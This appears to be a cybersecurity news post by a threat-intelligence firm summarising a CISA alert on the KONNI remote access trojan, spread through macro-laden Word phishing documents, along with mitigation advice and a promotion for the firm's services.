Hackers are using a phishing campaign to deploy KONNI malware, a remote access trojan (RAT), via Microsoft Word documents containing malicious Visual Basic Application (VBA) macro code, according to a recent Department of Homeland Security (DHS) Cybersecurity and Infrastructure alert (CISA).
First observed in 2014, the malware was linked to several campaigns tied to North Korea. There are also significant links in code with the NOKKI malware family and researchers possess some evidence that links KONNI to the APT37 hacking group.
KONNI is typically delivered through spear-phishing campaigns, which are highly targeted and personal in comparison to traditional phishing attacks that focus more on volume. The targeted nature of the attack makes it difficult for even the most tech-savvy user to detect.
According to the alert, KONNI’s malicious code can change the font color from light grey to black, to dupe the potential victim into enabling the contents of the malicious email.
The code is also able to determine if the Windows operating system is a 32-bit or 64-bit version, while constructing and executing the command line to download additional files.
A successful KONNI deployment could enable a hacker to steal data, capture keystrokes, take screenshots, and launch malicious, arbitrary code. KONNI is also able to collect the Internet protocol address and usernames, delete files, create shortcuts to masquerade as legitimate files, and gather architecture data, connected drives, hostname, and computer name from the victim’s machine. The malware has also been observed using the File Transfer Protocol to pull reconnaissance data from the victim’s system.
Of note, one version of KONNI can search for filenames created from previous versions of the malware, which suggests the hackers target the same victims – and that the versions may work together, according to MITRE research.
The DHS CISA alert provides administrators with detection signatures, as well as mitigation methods. Organizations are encouraged to follow best practices to strengthen their cyber posture, including maintaining up-to-date anti-virus signatures and engines.
Patch management is crucial to preventing exploit through vulnerable systems, while file and printer sharing services should be disabled or protected with strong passwords or active directory authentication.
User permissions should be restricted from installing and running unwanted software and should never be added to the local administrator’s group unless its required for their role. Administrators must always ensure all software downloaded from the Internet and email attachments are scanned and deemed safe - prior to opening.
Hackers have increasingly leveraged phishing attacks in recent months, with CISA recently alerting to a campaign designed to spoof the COVID-19 loan relief website. Researchers have also seen an increase in business email compromise phishing campaigns able to bypass multi-factor authentication and another scam targeting Microsoft Office 365 executive accounts.
Red Sky Alliance can help protect with attacks such as these. We provide both internal monitoring in tandem with RedXray notifications on ‘external’ threats to include, botnet activity, public data breaches, phishing, fraud, and general targeting.
Red Sky Alliance is in New Boston, NH USA. We are a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the lab directly at 1-844-492-7225, or feedback@wapacklabs.com
- Reporting: https://www.redskyalliance.org/
- Website: https://www.wapacklabs.com/
- LinkedIn: https://www.linkedin.com/company/64265941
Comments